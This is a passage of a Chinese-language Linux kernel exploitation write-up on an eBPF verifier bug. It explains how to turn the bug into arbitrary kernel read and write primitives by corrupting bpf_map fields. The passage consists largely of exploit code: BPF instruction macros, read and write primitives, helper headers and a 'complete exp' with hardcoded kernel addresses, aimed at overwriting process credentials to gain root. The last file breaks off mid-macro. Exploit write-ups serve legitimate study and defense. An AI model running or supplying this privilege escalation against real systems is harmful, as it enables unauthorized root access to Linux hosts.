struct btf *btf;
......
};

但函数 bpf_map_get_info_by_fd 被调用时,程序会把 bpf_map->btf.id 拷贝给用户空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static int bpf_map_get_info_by_fd(struct file *file,
struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
struct bpf_map_info info;
u32 info_len = attr->info.info_len;
int err;

......

if (map->btf) {
info.btf_id = btf_obj_id(map->btf);
info.btf_key_type_id = map->btf_key_type_id;
info.btf_value_type_id = map->btf_value_type_id;
}

......

if (copy_to_user(uinfo, &info, info_len) ||
put_user(info_len, &uattr->info.info_len))
return -EFAULT;

return 0;
}

劫持 bpf_map->btf 即可完成 RAA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#define READ_ARBITRARY_ADDR(__map_fd, __idx)            \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map->btf(这里的 0x58 是 btf.id 的偏移)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

构造任意写 WAA:

核心思想就是覆盖 bpf_map->opsbpf_array.value(可控地址),并在 bpf_array.value 上伪造一个 fake ops 将 ops->map_push_elem 替换为 array_map_get_next_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;

if (index >= array->map.max_entries) {
*next = 0;
return 0;
}

if (index == array->map.max_entries - 1)
return -ENOENT;

*next = index + 1;
return 0;
}
  • key 小于 map.max_entries 时,key 会被写入到 next_key 当中
  • 如果正常调用 map_get_next_key:只能控制 key 但是 next_key 不能控制
  • 如果通过函数指针 ops->map_push_elem 进行调用:可以控制这两个参数

当我们更新 eBPF map 时,若 map 类型为 BPF_MAP_TYPE_QUEUEBPF_MAP_TYPE_STACK,则函数 bpf_map->ops->map_push_elem 就会被调用,不过在函数 map_update_elem 中还有一个检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static int map_update_elem(union bpf_attr *attr)
{

......

if ((attr->flags & BPF_F_LOCK) &&
!map_value_has_spin_lock(map)) {
err = -EINVAL;
goto err_put;
}

......

return err;
}
1
2
3
4
static inline bool map_value_has_spin_lock(const struct bpf_map *map)
{
return map->spin_lock_off >= 0;
}
  • 若 flags 设置了 BPF_F_LOCK 标志位,则会检查 map->spin_lock_off 是否大于等于 0,因此这里我们还要将该字段改为一个正整数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#define MAKE_ARBITRARY_WRITE_OPS(__map_fd)                  \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map 中的各个条目:
    • spin_lock_off = 0x2000(绕过 map_update_elem 中的检查)
    • max_entries = 0xffffffff(为了满足 key < map.max_entries 的条件)
    • map_type = 23(BPF_MAP_TYPE_STACK)(为了使 bpf_map->ops->map_push_elem 能被调用)
    • ops = target_addr(设置写入的目标地址)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* 读取bpf_map->ops,以保证程序的正常功能 */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* 覆写bpf_map->ops->map_push_elem */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

在获取以上所有组件之后,程序的入侵步骤如下:

  • 泄露 map_ops_addr 计算内核基地址
  • 泄露 map_addr
  • 利用 RAA 扫描内存,泄露 current_taskcurrent_cred
  • 覆盖 bpf_map->ops->map_push_elem,为 WAA 做准备
  • 利用 WAA 覆盖 current_cred 并进行提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/if_packet.h>

static __always_inline void err_print(const char *msg)
{
printf("\033[31m\033[1m[x] Run eBPF error: \033[0m%s\n", msg);
}

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM \
})

#define BPF_ALU64_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU32_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU64_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU32_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV64_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV32_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV64_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV32_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_DW | BPF_IMM, DST, SRC, 0, (uint32_t) (IMM)),\
BPF_RAW_INSN(0, 0, 0, 0, ((uint64_t) (IMM)) >> 32)

#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */
#define BPF_LD_ABS(SIZE, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, 0, 0, 0, IMM)

/* dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

/* *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, DST, SRC, OFF, OP)

#define BPF_STX_XADD(SIZE, DST, SRC, OFF) \
BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* *(uint *) (dst_reg + off16) = imm */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_JMP_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() \
BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#ifndef __user
#define __user
#endif

#ifndef __rcu
#define __rcu
#endif

struct bpf_map;
struct btf;
struct btf_type;
struct bpf_prog;
struct bpf_prog_aux;
struct poll_table_struct;
struct vm_area_struct;
struct bpf_local_storage_map;

/* map is generic key/value storage optionally accesible by eBPF programs */
struct bpf_map_ops {
/* funcs callable from userspace (via syscall) */
int (*map_alloc_check)(union bpf_attr *attr);
struct bpf_map *(*map_alloc)(union bpf_attr *attr);
void (*map_release)(struct bpf_map *map, struct file *map_file);
void (*map_free)(struct bpf_map *map);
int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
void (*map_release_uref)(struct bpf_map *map);
void *(*map_lookup_elem_sys_only)(struct bpf_map *map, void *key);
int (*map_lookup_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_lookup_and_delete_batch)(struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_update_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_delete_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);

/* funcs callable from userspace and from eBPF programs */
void *(*map_lookup_elem)(struct bpf_map *map, void *key);
int (*map_update_elem)(struct bpf_map *map, void *key, void *value,
uint64_t flags);
int (*map_delete_elem)(struct bpf_map *map, void *key);
int (*map_push_elem)(struct bpf_map *map, void *value, uint64_t flags);
int (*map_pop_elem)(struct bpf_map *map, void *value);
int (*map_peek_elem)(struct bpf_map *map, void *value);

/* funcs called by prog_array and perf_event_array map */
void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
int fd);
void (*map_fd_put_ptr)(void *ptr);
int (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
uint32_t (*map_fd_sys_lookup_elem)(void *ptr);
void (*map_seq_show_elem)(struct bpf_map *map, void *key,
struct seq_file *m);
int (*map_check_btf)(const struct bpf_map *map,
const struct btf *btf,
const struct btf_type *key_type,
const struct btf_type *value_type);

/* Prog poke tracking helpers. */
int (*map_poke_track)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_untrack)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_run)(struct bpf_map *map, uint32_t key,
struct bpf_prog *old, struct bpf_prog *new);

/* Direct value access helpers. */
int (*map_direct_value_addr)(const struct bpf_map *map,
uint64_t *imm, uint32_t off);
int (*map_direct_value_meta)(const struct bpf_map *map,
uint64_t imm, uint32_t *off);
int (*map_mmap)(struct bpf_map *map, struct vm_area_struct *vma);
__poll_t (*map_poll)(struct bpf_map *map, struct file *filp,
struct poll_table_struct *pts);

/* Functions called by bpf_local_storage maps */
int (*map_local_storage_charge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
void (*map_local_storage_uncharge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
struct bpf_local_storage __rcu ** (*map_owner_storage_ptr)(void *owner);

/* map_meta_equal must be implemented for maps that can be
* used as an inner map. It is a runtime check to ensure
* an inner map can be inserted to an outer map.
*
* Some properties of the inner map has been used during the
* verification time. When inserting an inner map at the runtime,
* map_meta_equal has to ensure the inserting map has the same
* properties that the verifier has used earlier.
*/
int (*map_meta_equal)(const struct bpf_map *meta0,
const struct bpf_map *meta1);

/* BTF name and id of struct allocated by map_alloc */
const char * const map_btf_name;
int *map_btf_id;

/* bpf_iter info used to open a seq_file */
const struct bpf_iter_seq_info *iter_seq_info;
};

static __always_inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_load_prog(unsigned int prog_type, struct bpf_insn *insns, uint64_t insn_cnt,
char *log_buf, unsigned int log_buf_sz, unsigned int log_level)
{
union bpf_attr attr = {
.prog_type = prog_type,
.insns = (uint64_t) insns,
.insn_cnt = insn_cnt,
.license = (uint64_t) "GPL",
.log_level = log_level,
.log_buf = (uint64_t) log_buf,
.log_size = log_buf_sz,
};

return bpf(BPF_PROG_LOAD, &attr);
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};

return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void *key, void *value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.value = (uint64_t) value,
};

return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd,const void *key,const void *value,uint64_t flags)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.value = (uint64_t) value,
.flags = flags,
};

return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void *key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
};

return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void *key, void *value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.next_key = (uint64_t) value,
};

return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

#define BPF_LOG_BUF_SZ 0x100000
static char bpf_log_buf[BPF_LOG_BUF_SZ] = { '\0' };

/**
* @brief Run a bpf prog by attaching to a pair of sockets and sending packets
*
* @param insns bpf program to be run
* @param insn_cnt number of bpf instructions
* @return int 0 for success, others for failure
*/
static int
run_bpf_prog(struct bpf_insn *insns, uint64_t insn_cnt, unsigned int log_level,
unsigned int print_log)
{
char *err_msg = NULL;
int sock_fd[2], prog_fd;
int ret;

/* socket pair to trigger eBPF prog */
ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, sock_fd);
if (ret < 0) {
err_msg = "FAILED to creat socket pair!";
goto err_socket;
}

memset(bpf_log_buf, 0, sizeof(bpf_log_buf));

/* load bpf prog into kernel */
prog_fd = bpf_load_prog(BPF_PROG_TYPE_SOCKET_FILTER, insns, insn_cnt,
bpf_log_buf, BPF_LOG_BUF_SZ, log_level);
if (prog_fd < 0) {
ret = prog_fd;
err_msg = "FAILED to load bpf program!";
goto err_bpf_load;
}

/* attach bpf prog to a socket */
ret = setsockopt(sock_fd[0],SOL_SOCKET,SO_ATTACH_BPF, &prog_fd,sizeof(int));
if (ret < 0) {
err_msg = "FAILED to attach the bpf program!";
goto err_bpf_attach;
}

/* send a packet to trigger bpf */
write(sock_fd[1], "11111111", 8);

/* output the log */
if (print_log != 0) {
puts(bpf_log_buf);
}

/* recycle resource */
close(prog_fd);
close(sock_fd[1]);
close(sock_fd[0]);

return 0;

err_bpf_attach:
close(prog_fd);
err_bpf_load:
puts(bpf_log_buf);
close(sock_fd[1]);
close(sock_fd[0]);
err_socket:
err_print(err_msg);
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define ARRAY_MAP_OPS 0xffffffff822363e0
#define ARRAY_MAP_GET_NEXT_KEY 0xffffffff81239c80
#define INIT_TASK 0xffffffff82e1b400
#define INIT_CRED 0xffffffff82e88f20

#define VULN_REG BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)

#define MAKE_VULN_REG(__map_fd) \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define LEAK_MAP_OPS(__map_fd) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

#define LEAK_MAP_ADDR(__map_fd) \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV32_REG(VULN_REG, VULN_REG), \
BPF_ALU64_REG(BPF_ADD, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_8), \
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0)

#define READ_ARBITRARY_ADDR(__map_fd, __idx) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)

#define MAKE_ARBITRARY_WRITE_OPS(__map_fd) \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
